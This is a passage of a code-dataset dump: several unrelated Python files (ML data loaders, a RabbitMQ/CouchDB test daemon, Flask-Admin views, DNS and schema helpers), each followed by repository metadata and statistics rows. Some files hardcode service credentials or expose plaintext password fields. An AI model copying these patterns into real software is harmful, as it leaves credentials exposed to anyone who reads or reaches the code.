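TPCH_TABLES = ["customer", "lineitem", "nation", "region",
               "orders", "part", "partsupp", "supplier"]


class TpchTables:
    def __init__(self, reader, dir):
        # reader stands in for spark.read.parquet
        for name in TPCH_TABLES:
            setattr(self, name, reader(dir + name))


# Demonstration with a trivial reader that just echoes the path:
t = TpchTables(lambda path: path, "s3://tpch/")
print(t.customer)  # s3://tpch/customer
```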
| 43 | 70 | 0.683463 | 103 | 774 | 5.097087 | 0.427184 | 0.137143 | 0.24381 | 0.289524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204134 | 774 | 17 | 71 | 45.529412 | 0.852273 | 0.249354 | 0 | 0 | 0 | 0 | 0.093588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f1d77811b98689b2cae0d686170946ae5f678f0 | 621 | py | Python | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi-boilerplate | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | null | null | null | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi-boilerplate | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | 2 | 2021-11-11T15:19:30.000Z | 2022-02-07T22:52:07.000Z | server/schemas/kind_to_strain.py | Georgi2704/pricelist-fastapi | 24b88e1f5c28b7eaff50745cd4464caac6de01e6 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import Optional
from uuid import UUID
from server.schemas.base import BoilerplateBaseModel
class KindToStrainBase(BoilerplateBaseModel):
    kind_id: UUID
    strain_id: UUID


# Properties to receive via API on creation
class KindToStrainCreate(KindToStrainBase):
    pass


# Properties to receive via API on update
class KindToStrainUpdate(KindToStrainBase):
    pass


class KindToStrainInDBBase(KindToStrainBase):
    id: UUID

    class Config:
        orm_mode = True


# Additional properties to return via API
class KindToStrainSchema(KindToStrainInDBBase):
    pass
| 18.818182 | 52 | 0.780998 | 69 | 621 | 6.985507 | 0.492754 | 0.037344 | 0.078838 | 0.091286 | 0.112033 | 0.112033 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178744 | 621 | 32 | 53 | 19.40625 | 0.945098 | 0.194847 | 0 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.176471 | 0.235294 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
0f2faddde2571ad100ca7bd92dfedb14e2aab42d | 375 | py | Python | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
] | null | null | null | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
] | null | null | null | examples/bbox.py | mzaglia/stac.py | 39314add494b5ab1bf11c44dcb69eba4614144db | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
#%%
import stac
#%%
s = stac.STAC('http://brazildatacube.dpi.inpe.br/bdc-stac/0.8.1/', True)
#%%
s.catalog
#%%
collection = s.collection('C4_64_16D_MED')
collection
#%%
items = collection.get_items(filter={'bbox':'-56.86523437500001,-15.919073517982413,-53.17382812500001,-13.902075852500483', 'time':'2016-09-13/2019-12-31'})
items
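The `bbox` filter passed above is a comma-separated `west,south,east,north` string in lon/lat order (the STAC/GeoJSON bounding-box convention). A small parsing sketch (the helper name `parse_bbox` is mine, not part of stac.py):

```python
def parse_bbox(value):
    """Split a 'west,south,east,north' bbox string into named floats."""
    west, south, east, north = (float(v) for v in value.split(','))
    return {'west': west, 'south': south, 'east': east, 'north': north}


box = parse_bbox('-56.865,-15.919,-53.173,-13.902')
print(box['west'])  # -56.865
```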
| 19.736842 | 157 | 0.698667 | 55 | 375 | 4.690909 | 0.781818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263768 | 0.08 | 375 | 18 | 158 | 20.833333 | 0.484058 | 0.117333 | 0 | 0 | 0 | 0 | 0.518519 | 0.302469 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0f3c685bf3c706b184f1be524f6612e1e97c2875 | 1,704 | py | Python | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | designate/backend/impl_infoblox/record_factory.py | infobloxopen/designate | 531a28b8453cfe5641284a16e0342db8d709ab36 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Infoblox
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from designate.i18n import _LI
from designate.backend.impl_infoblox.records import a
from designate.backend.impl_infoblox.records import aaaa
from designate.backend.impl_infoblox.records import cname
from designate.backend.impl_infoblox.records import ptr
from designate.backend.impl_infoblox.records import soa
from designate.backend.impl_infoblox.records import ns
LOG = logging.getLogger(__name__)
class RecordFactory(object):
    @staticmethod
    def get_record(recordset, infoblox, tenant_name):
        if recordset.type == "A":
            return a.ARecord(infoblox, tenant_name)
        if recordset.type == "CNAME":
            return cname.CNameRecord(infoblox, tenant_name)
        if recordset.type == "NS":
            return ns.NSRecord(infoblox, tenant_name)
        if recordset.type == "SOA":
            return soa.SOARecord(infoblox, tenant_name)
        if recordset.type == "PTR":
            return ptr.PTRRecord(infoblox, tenant_name)
        if recordset.type == "AAAA":
            return aaaa.AAAARecord(infoblox, tenant_name)
        LOG.error(_LI("Unknown type %s"), recordset.type)
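The if-chain above maps record types to classes one at a time; the same dispatch is often written as a lookup table, which keeps the mapping in one place. A sketch with stand-in classes (the real code would map to `a.ARecord`, `cname.CNameRecord`, and so on):

```python
class ARecord:
    def __init__(self, infoblox, tenant_name):  # args unused in this sketch
        self.kind = "A"


class CNameRecord:
    def __init__(self, infoblox, tenant_name):
        self.kind = "CNAME"


# One place to register every supported record type.
RECORD_CLASSES = {"A": ARecord, "CNAME": CNameRecord}


def get_record(record_type, infoblox, tenant_name):
    cls = RECORD_CLASSES.get(record_type)
    if cls is None:
        return None  # caller would log "Unknown type" here
    return cls(infoblox, tenant_name)


print(get_record("A", None, None).kind)  # A
```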
| 39.627907 | 75 | 0.7277 | 227 | 1,704 | 5.374449 | 0.440529 | 0.07459 | 0.103279 | 0.118033 | 0.383607 | 0.383607 | 0.221311 | 0 | 0 | 0 | 0 | 0.007252 | 0.190728 | 1,704 | 42 | 76 | 40.571429 | 0.877447 | 0.320423 | 0 | 0 | 0 | 0 | 0.028846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.32 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0f42949be84c6e30aca5f319502468abb01b7512 | 849 | py | Python | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | 1 | 2020-03-26T19:20:03.000Z | 2020-03-26T19:20:03.000Z | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | null | null | null | crescent/resources/s3/bucket/transition.py | mpolatcan/zepyhrus | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | [
"Apache-2.0"
] | null | null | null | from crescent.core import Model
from crescent.functions import AnyFn
from .constants import AllowedValues, ModelRequiredProperties
from typing import Union
class Transition(Model):
def __init__(self):
super(Transition, self).__init__(
allowed_values={self.StorageClass.__name__: AllowedValues.TRANSITION_SC},
required_properties=ModelRequiredProperties.TRANSITION
)
def StorageClass(self, storage_class: Union[str, AnyFn]):
return self._set_field(self.StorageClass.__name__, storage_class)
def TransitionDate(self, transition_date: Union[str, AnyFn]):
return self._set_field(self.TransitionDate.__name__, transition_date)
def TransitionInDays(self, transition_in_days: Union[int, AnyFn]):
return self._set_field(self.TransitionInDays.__name__, transition_in_days)
| 38.590909 | 85 | 0.759717 | 94 | 849 | 6.425532 | 0.382979 | 0.054636 | 0.074503 | 0.089404 | 0.160596 | 0.160596 | 0.115894 | 0.115894 | 0 | 0 | 0 | 0 | 0.160188 | 849 | 21 | 86 | 40.428571 | 0.847125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.1875 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0f4db0e6bc89de8ac27da4ed1b34ec1251d19ce7 | 6,107 | py | Python | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | 1 | 2020-06-23T10:41:33.000Z | 2020-06-23T10:41:33.000Z | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | null | null | null | Testing/daemon_Fake_Dev.py | nandor1992/FogOfThings | c412c26bfbd31162683e57b3dc2b5a0a5f21d9b0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import couchdb
import pika
import ast
import time
import threading
import ctypes
import datetime
import sys
from daemon import Daemon
import ConfigParser
import logging
t=time
t.clock()
PIDFILE="/home/pi/FogOfThings/Device/pid/fake_dev.pid"
Config=ConfigParser.ConfigParser()
Config.read("/home/pi/FogOfThings/Device/config.ini")
LOGFILE = Config.get("Log","location")+'/fake_dev.log'
logging.basicConfig(filename=LOGFILE,level=logging.DEBUG)
logging.getLogger("pika").setLevel(logging.ERROR)
class Listener():
def __init__(self,c_user,c_pass,user,passw,port,virt,que,dev,rte,rate):
logging.debug("Initialized!")
self.c_user=c_user
self.c_pass=c_pass
self.couch=couchdb.Server('http://'+self.c_user+':'+self.c_pass+'@127.0.0.1:5984/')
self.credentials = pika.PlainCredentials(user,passw)
self.parameters = pika.ConnectionParameters('localhost',port,virt,self.credentials)
self.connection = pika.BlockingConnection(self.parameters);
self.channel = self.connection.channel()
self.channel.basic_qos(prefetch_count=1)
self.device="Python_Dev"
self.channel.basic_consume(self.on_request, queue=que,no_ack=True)
self.sum=0.0
self.rec_time=t.time()
self.t_start=datetime.datetime.now()
self.count=0
self.proc=0.0
self.first=0;
self.rate=rate
self.t_start=datetime.datetime.now()
self.C_Dev=dev
self.C_Rate=rte
def saveToCouch(self,data):
db=self.couch['monitoring']
data['type']="Driver"
data['Gateway']=Config.get("General","gateway_name")
data['Device']=self.C_Dev
data['Rate']=self.C_Rate
logging.debug(data)
db.save(data)
def on_request(self,ch, method, properties, body):
global t
global rate
        data = ast.literal_eval(body)
        # logging.debug("---------------Message Received-----------")
        # logging.debug("Cnt:" + str(self.count))
        end = t.time()
        # logging.debug(data['start_time'])
        # logging.debug(end)
        start = float(data['start_time'])
        # logging.debug("Elapsed: " + str((end - start) * 1000))
        # logging.debug("Processing: " + str(int(data['proc_time']) / 1000.0))
        if end - self.rec_time >= self.rate:
            logging.debug("Started at:" + str(self.t_start))
            data = self.summary()
            data['date'] = self.t_start.strftime("%Y-%m-%d %H:%M:%S")
            logging.debug(data)
            self.t_start = datetime.datetime.now()
            self.sum = 0.0
            self.count = 0
            self.proc = 0.0
            self.rec_time = end
            self.saveToCouch(data)
        else:
            self.sum = self.sum + (end - start) * 1000
            self.count = self.count + 1
            self.proc = self.proc + int(data['proc_time']) / 1000.0

    def putData(self, data):
        db = self.couch['monitoring']
        db.save(data)

    def stop(self):
        self.channel.stop_consuming()
        self.channel.close()
        self.connection.close()
        logging.debug("Stopped Listening!")

    def summary(self):
        return {'response_time': self.sum / self.count,
                'proc_time': self.proc / self.count}

    def run(self):
        logging.debug("Started Listening!")
        self.channel.start_consuming()


class Poster(threading.Thread):
    # module-level flag shared with the main thread to stop the posting loop
    global running
    running = True

    def __init__(self, c_user, c_pass, user, passw, port, virt, rate, dev):
        logging.debug("Initialized!")
        threading.Thread.__init__(self)
        self.c_user = c_user
        self.c_pass = c_pass
        self.couch = couchdb.Server('http://' + self.c_user + ':' + self.c_pass + '@127.0.0.1:5984/')
        self.credentials = pika.PlainCredentials(user, passw)
        self.parameters = pika.ConnectionParameters('localhost', port, virt, self.credentials)
        self.connection = pika.BlockingConnection(self.parameters)
        self.channel = self.connection.channel()
        self.channel.basic_qos(prefetch_count=1)
        self.device = dev
        self.rate = 10.0 / rate
        self.count = 0

    def send_request(self):
        global t
        message_amqp = t.time()
        properties_m = pika.BasicProperties(headers={'device': self.device})
        self.channel.basic_publish(exchange='device', routing_key='',
                                   body="{:10.8f}".format(message_amqp),
                                   properties=properties_m)

    def stop(self):
        global running
        running = False

    def run(self):
        global running
        logging.debug("Started Posting!")
        # while not self.stopMe:
        #     self.send_request()
        #     time.sleep(self.rate)
        while running:
            self.send_request()
            time.sleep(self.rate)
        self.channel.close()
        self.connection.close()
        logging.debug("Posting Done!")


class Fake_Dev():
    def init(self, dev, rate, que):
        self.l = Listener("admin", "hunter", "admin", "hunter", 5672, "test", que, dev, rate, 10)
        self.p = Poster("admin", "hunter", "admin", "hunter", 5672, "test", rate, dev)

    def run(self):
        self.p.start()
        self.l.run()

    def stop(self):
        try:
            self.p.stop()
            time.sleep(2)
            self.l.stop()
        except AttributeError:
            pass
        logging.debug("Interrupt Keyboard - Stop!")


if __name__ == "__main__":
    up = Fake_Dev()
    dev = rate = que = None
    try:
        for arg in sys.argv:
            part = arg.split("=")
            if part[0][2:] == "device":
                dev = part[1]
            elif part[0][2:] == "rate":
                rate = float(part[1])
            elif part[0][2:] == "que":
                que = part[1]
        if dev is not None and rate is not None and que is not None:
            msg_rate = rate * 10
        else:
            exit()
        up.init(dev, rate, que)
        up.run()
    except Exception as e:
        logging.debug(e)
        up.stop()
        logging.debug("Exiting Main Thread - Error")
    except KeyboardInterrupt:
        up.stop()
        logging.debug("Exiting Main Thread - Keyboard")
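The `__main__` block above parses `--key=value` command-line flags by hand with `split("=")` and `part[0][2:]`. The same idea, isolated as a minimal self-contained sketch (the function name `parse_kv_args` is illustrative, not part of the original script):

```python
def parse_kv_args(argv):
    """Parse "--key=value" style arguments into a dict (sketch)."""
    opts = {}
    for arg in argv:
        if "=" not in arg:
            continue  # skip e.g. the script name itself
        key, value = arg.split("=", 1)
        opts[key[2:]] = value  # drop the leading "--", as part[0][2:] does above
    return opts
```

Collecting the flags into a dict avoids the NameError the original risks when a flag is missing, since absent keys can be checked with `in`.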
# models/base_model.py (repo: siyuhuang/PoseStylizer, license: BSD-3-Clause)

import os
import torch
import torch.nn as nn
import numpy as np
import pickle


class BaseModel(nn.Module):
    def __init__(self):
        super(BaseModel, self).__init__()

    def name(self):
        return 'BaseModel'

    def initialize(self, opt):
        self.opt = opt
        self.gpu_ids = opt.gpu_ids
        self.isTrain = opt.isTrain
        self.Tensor = torch.cuda.FloatTensor if self.gpu_ids else torch.Tensor
        self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)

    def set_input(self, input):
        self.input = input

    def forward(self):
        pass

    # used at test time, no backprop
    def test(self):
        pass

    def get_image_paths(self):
        pass

    def optimize_parameters(self):
        pass

    def get_current_visuals(self):
        return self.input

    def get_current_errors(self):
        return {}

    def save(self, label):
        pass

    # helper saving function that can be used by subclasses
    def save_network(self, network, network_label, epoch_label, gpu_ids, epoch, total_steps):
        save_filename = '%s_%s.pth' % (epoch_label, network_label)
        save_infoname = '%s.pkl' % (epoch_label)
        save_path = os.path.join(self.save_dir, save_filename)
        save_infoname = os.path.join(self.save_dir, save_infoname)
        torch.save(network.cpu().state_dict(), save_path)
        network.cuda()
        info = {'epoch': epoch, 'total_steps': total_steps}
        with open(save_infoname, "wb") as filehandler:
            pickle.dump(info, filehandler)

    # helper loading function that can be used by subclasses
    def load_network(self, network, network_label, epoch_label):
        save_filename = '%s_%s.pth' % (epoch_label, network_label)
        save_path = os.path.join(self.save_dir, save_filename)
        if os.path.exists(save_path):
            network.load_state_dict(torch.load(save_path))
            print("Found checkpoint. Network loaded.")
        else:
            print("No checkpoint found. Training network from scratch.")

    # update learning rate (called once every epoch)
    def update_learning_rate(self):
        for scheduler in self.schedulers:
            scheduler.step()
        lr = self.optimizers[0].param_groups[0]['lr']
        print('learning rate = %.7f' % lr)
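`save_network` and `load_network` agree on a filename convention: weights go to `<epoch>_<net>.pth`, bookkeeping info to `<epoch>.pkl`. That convention in isolation, as a hypothetical helper (not part of the original class):

```python
def checkpoint_names(epoch_label, network_label):
    """Mirror the naming scheme used by save_network/load_network above."""
    weights = '%s_%s.pth' % (epoch_label, network_label)  # state_dict file
    info = '%s.pkl' % (epoch_label,)                      # pickled epoch/step info
    return weights, info
```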
# app/api/v2/models/user_model.py (repo: MbuguaCaleb/Questioner-V2-API, license: MIT)

from ....db_conn import initialize_db
from psycopg2.extras import RealDictCursor
from werkzeug.security import generate_password_hash, check_password_hash

con = initialize_db()
cur = con.cursor(cursor_factory=RealDictCursor)


class User(object):
    """Model class for the user object."""

    table = 'users'

    def save(self, data=None):
        query = """
            INSERT INTO users (firstname, lastname, email, phone_number, username, password)
            VALUES (%(firstname)s, %(lastname)s, %(email)s, %(phone_number)s, %(username)s, %(password)s);"""
        cur.execute(query, data)
        con.commit()
        return data

    def exists(self, key, value):
        """Check whether a user with the given attribute exists."""
        # key names the column (cannot be a placeholder); the value is passed
        # as a bound parameter so it is quoted safely by the driver.
        query = "SELECT * FROM {} WHERE {} = %s".format(self.table, key)
        cur.execute(query, (value,))
        result = cur.fetchall()
        return len(result) > 0

    def find(self, key, value):
        """Fetch a single user record from the DB."""
        query = "SELECT * FROM {} WHERE {} = %s".format(self.table, key)
        cur.execute(query, (value,))
        return cur.fetchone()

    @staticmethod
    def checkpassword(hashed_password, password):
        """Check whether the plaintext password matches the stored hash."""
        return check_password_hash(hashed_password, password)
# -*- coding: utf-8 -*-
# views.py (repo: zhoubogao/hhlyDevops, license: Unlicense)
from flask import url_for, redirect, request, current_app
from flask_admin.contrib.sqla import ModelView
from flask_admin import AdminIndexView, helpers, expose
from werkzeug.security import generate_password_hash
from flask_login import current_user, login_user, logout_user
from models import User, Role, Device, Platforms_info, Ip, Project, Domain, Port, App
from forms import LoginForm
from flask_principal import (
    ActionNeed,
    AnonymousIdentity,
    Identity,
    identity_changed,
    identity_loaded,
    Permission,
    Principal,
    RoleNeed,
    Denial
)

# Initialize flask-principal
prcp = Principal()

anon_permission = Permission()
admin_permission = Permission(RoleNeed('Admin'))
admin_or_editor = Permission(RoleNeed('Admin'), RoleNeed('Devlop'))
devlop_permission = Permission(RoleNeed('Devlop'))
admin_denied = Denial(RoleNeed('Admin'))


# Create customized model view class
class UserModelView(ModelView):
    can_export = True
    can_view_details = True
    column_exclude_list = ['password', ]
    column_searchable_list = ('real_name', 'login', Role.name)
    column_display_all_relations = True

    def is_accessible(self):
        return current_user.is_authenticated

    def on_model_change(self, form, User, is_created):
        User.password = generate_password_hash(form.password.data)


# Create customized model view class
class RoleModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('description',)
    column_searchable_list = ('name', User.login)
    column_display_all_relations = True


# Create customized model view class
class Platforms_infoModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('platform', 'description', 'url',
                            'username', 'password', 'ps')
    column_searchable_list = ('platform', 'description', 'url',
                              'username', 'password', 'ps')
    column_display_all_relations = True


# Create customized model view class
class DeviceModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('device_num', 'device_name', 'idc', 'location',
                            'used_to', 'hardware_type', 'brand', 'buy_date',
                            'fast_repair_code', 'cpu', 'memory', 'disk')
    column_searchable_list = ('device_num', 'device_name', 'idc', 'location',
                              'used_to', 'hardware_type', 'brand', 'buy_date',
                              'fast_repair_code', 'cpu', 'memory', 'disk',
                              Ip.ip)
    column_display_all_relations = True


# Create customized model view class
class IpModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('isp', 'ip', 'use', 'mask', 'mac',
                            'route', 'switch_port',
                            'username', 'password')
    column_searchable_list = ('isp', 'ip', 'use', 'mask', 'mac',
                              'route', 'switch_port',
                              'username', 'password')
    column_display_all_relations = True


# Create customized model view class
class ProjectModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('project', )
    column_searchable_list = ('project', App.app)
    column_display_all_relations = True


# Create customized model view class
class DomainModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('domain',)
    column_searchable_list = ('domain', App.app)
    column_display_all_relations = True


# Create customized model view class
class PortModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('port',)
    column_searchable_list = ('port', App.app)
    column_display_all_relations = True


# Create customized model view class
class AppModelView(ModelView):
    can_export = True
    can_view_details = True
    column_editable_list = ('description', 'ps',)
    column_searchable_list = ('app', Domain.domain, Port.port)
    column_display_all_relations = True


# Create customized index view class that handles login & registration
class OpsAdminIndexView(AdminIndexView):
    @expose('/')
    # @anon_permission.require(http_exception=403)
    # @admin_denied.require(http_exception=403)
    def index_view(self):
        if not current_user.is_authenticated:
            return redirect(url_for('auth.login'))
        # with admin_permission.require(http_exception=403):
        return super(OpsAdminIndexView, self).index_view()
# dataset.py (repo: DerryHub/the-TaobaoLive-Commodity-Identify-Competition, license: MIT)

import os
import torch
import numpy as np
from tqdm import tqdm
import json
from torch.utils.data import Dataset, DataLoader
from arcface.resnet import ResNet
from arcface.googlenet import GoogLeNet
from arcface.inception_v4 import InceptionV4
from arcface.inceptionresnet_v2 import InceptionResNetV2
from arcface.densenet import DenseNet
from arcface.resnet_cbam import ResNetCBAM
import torchvision.transforms as transforms
import cv2
import random
import jieba
from autoaugment import rand_augment_transform
from PIL import Image

'''
for image-text match
'''


class ITMatchTrain(Dataset):
    def __init__(self, opt):
        arcfaceDataset = ArcfaceDataset(root_dir=opt.data_path, mode="train",
                                        size=(opt.size, opt.size), imgORvdo='video')
        batch_size = 256
        training_params = {"batch_size": batch_size,
                           "shuffle": False,
                           "drop_last": False,
                           "num_workers": opt.workers}
        arcfaceLoader = DataLoader(arcfaceDataset, **training_params)

        self.vocab_size = arcfaceDataset.vocab_size

        if opt.network == 'resnet':
            model = ResNet(opt)
            b_name = opt.network + '_' + opt.mode + '_{}'.format(opt.num_layers_r)
        elif opt.network == 'googlenet':
            model = GoogLeNet(opt)
            b_name = opt.network
        elif opt.network == 'inceptionv4':
            model = InceptionV4(opt)
            b_name = opt.network
        elif opt.network == 'inceptionresnetv2':
            model = InceptionResNetV2(opt)
            b_name = opt.network
        elif opt.network == 'densenet':
            model = DenseNet(opt)
            b_name = opt.network + '_{}'.format(opt.num_layers_d)
        elif opt.network == 'resnet_cbam':
            model = ResNetCBAM(opt)
            b_name = opt.network + '_{}'.format(opt.num_layers_c)
        else:
            raise RuntimeError('Cannot Find the Model: {}'.format(opt.network))

        model.load_state_dict(torch.load(os.path.join(opt.saved_path, b_name + '.pth')))
        model.cuda()
        model.eval()

        self.model_name = b_name
        self.features = torch.zeros((len(arcfaceDataset), opt.embedding_size))
        self.texts = torch.zeros((len(arcfaceDataset), 64)).long()
        self.instances = torch.zeros((len(arcfaceDataset))).long()

        print('Calculating features...')
        for i, d in enumerate(tqdm(arcfaceLoader)):
            # img = d['img'].cuda()
            text = d['text']
            instance = d['instance']
            # with torch.no_grad():
            #     feature = model(img).cpu()
            # self.features[i*batch_size:(i+1)*batch_size] = feature
            self.texts[i*batch_size:(i+1)*batch_size] = text
            self.instances[i*batch_size:(i+1)*batch_size] = instance

    def __len__(self):
        return self.texts.size(0)

    def __getitem__(self, index):
        text = self.texts[index]
        # feature = self.features[index]
        feature = None
        instance = self.instances[index]
        # return {'feature': feature, 'text': text, 'instance': instance}
        return {'text': text, 'instance': instance}
class ITMatchValidation(Dataset):
    def __init__(self, size=(224, 224), root_dir='data/validation_instance/',
                 maxLen=64, PAD=0, imgORvdo='video'):
        self.root_dir = root_dir
        self.size = size

        text2num = Text2Num(maxLen=maxLen, root_dir='data', PAD=PAD)
        self.vocab_size = text2num.vocab_size

        assert imgORvdo in ['image', 'video']

        tat = 'validation_' + imgORvdo + 's'
        # tat = 'train_' + imgORvdo + 's'

        with open(os.path.join('data', tat + '_text.json'), 'r') as f:
            textDic = json.load(f)

        for k in textDic.keys():
            textDic[k] = text2num(textDic[k])

        instances = os.listdir(root_dir)
        self.items = []
        print('Loading Data...')
        for instance in tqdm(instances):
            imgs = os.listdir(root_dir + instance)
            l = []
            for img in imgs:
                if imgORvdo in img:
                    l.append(os.path.join(instance, img))
                    text_name = img.split(instance)[-1].split('_')[0]
                    l.append(textDic[text_name])
                    break
            if len(l) < 2:
                continue
            self.items.append(l)
        print('Done')

        self.transform = transforms.Normalize(
            mean=[0.55574415, 0.51230767, 0.51123354],
            std=[0.21303795, 0.21604613, 0.21273348])

    def __len__(self):
        return len(self.items)

    def __getitem__(self, index):
        imgPath, text = self.items[index]
        text = torch.Tensor(text).long()
        # img = np.load(os.path.join(self.root_dir, imgPath))
        img = cv2.imread(os.path.join(self.root_dir, imgPath))
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        img = img.astype(np.float32) / 255

        # center-crop to the target size
        hi, wi, ci = img.shape
        rh = (hi - self.size[0]) // 2
        rw = (wi - self.size[1]) // 2
        img = img[rh:self.size[0]+rh, rw:self.size[1]+rw, :]

        img = torch.from_numpy(img)
        img = img.permute(2, 0, 1)
        img = self.transform(img)

        return {
            'img': img,
            'text': text
        }
'''
for text
'''


class Text2Num:
    def __init__(self, maxLen, root_dir='data', PAD=0):
        with open(os.path.join(root_dir, 'vocab.json'), 'r') as f:
            self.vocab = json.load(f)
        self.PAD = PAD
        self.maxLen = maxLen
        self.vocab_size = len(self.vocab)

    def __call__(self, text):
        words = jieba.cut(text, cut_all=False, HMM=True)
        # l = [len(self.vocab)]  # CLS
        l = []
        for w in words:
            if w.strip() in self.vocab:
                l.append(self.vocab[w.strip()])
        if len(l) > self.maxLen:
            l = l[:self.maxLen]
        elif len(l) < self.maxLen:
            l += [self.PAD] * (self.maxLen - len(l))
        assert len(l) == self.maxLen
        return l
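`Text2Num.__call__` always returns exactly `maxLen` token ids: longer sequences are truncated, shorter ones are right-padded with `PAD`. The pad/truncate step in isolation, without the jieba segmentation or vocab lookup (helper name is illustrative):

```python
def pad_or_truncate(ids, max_len, pad=0):
    """Force a token-id list to a fixed length, as Text2Num does."""
    if len(ids) > max_len:
        return ids[:max_len]          # truncate long sequences
    return ids + [pad] * (max_len - len(ids))  # right-pad short ones
```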
'''
for efficientdet
'''


class EfficientdetDataset(Dataset):
    def __init__(self, root_dir='data', mode='train', imgORvdo='all',
                 transform=None, maxLen=64, PAD=0):
        assert mode in ['train', 'validation']
        assert imgORvdo in ['image', 'video', 'all']

        self.root_dir = root_dir
        self.transform = transform

        text2num = Text2Num(maxLen=maxLen, root_dir=root_dir, PAD=PAD)
        self.vocab_size = text2num.vocab_size

        label_file = 'label.json'
        with open(os.path.join(root_dir, label_file), 'r') as f:
            self.labelDic = json.load(f)

        self.num_classes = len(self.labelDic['label2index'])

        if imgORvdo == 'image':
            tats = [mode + '_images']
        elif imgORvdo == 'video':
            tats = [mode + '_videos']
        else:
            tats = [mode + '_images', mode + '_videos']

        self.textDic = {}
        ds = []
        for t in tats:
            with open(os.path.join(root_dir, t + '_annotation.json'), 'r') as f:
                ds.append(json.load(f))
            with open(os.path.join(root_dir, t + '_text.json'), 'r') as f:
                self.textDic[t] = json.load(f)

        for k in self.textDic.keys():
            for kk in self.textDic[k].keys():
                self.textDic[k][kk] = text2num(self.textDic[k][kk])

        ls = [d['annotations'] for d in ds]

        self.images = []
        print('Loading {} {} data...'.format(mode, imgORvdo))
        for i, l in enumerate(ls):
            for d in l:
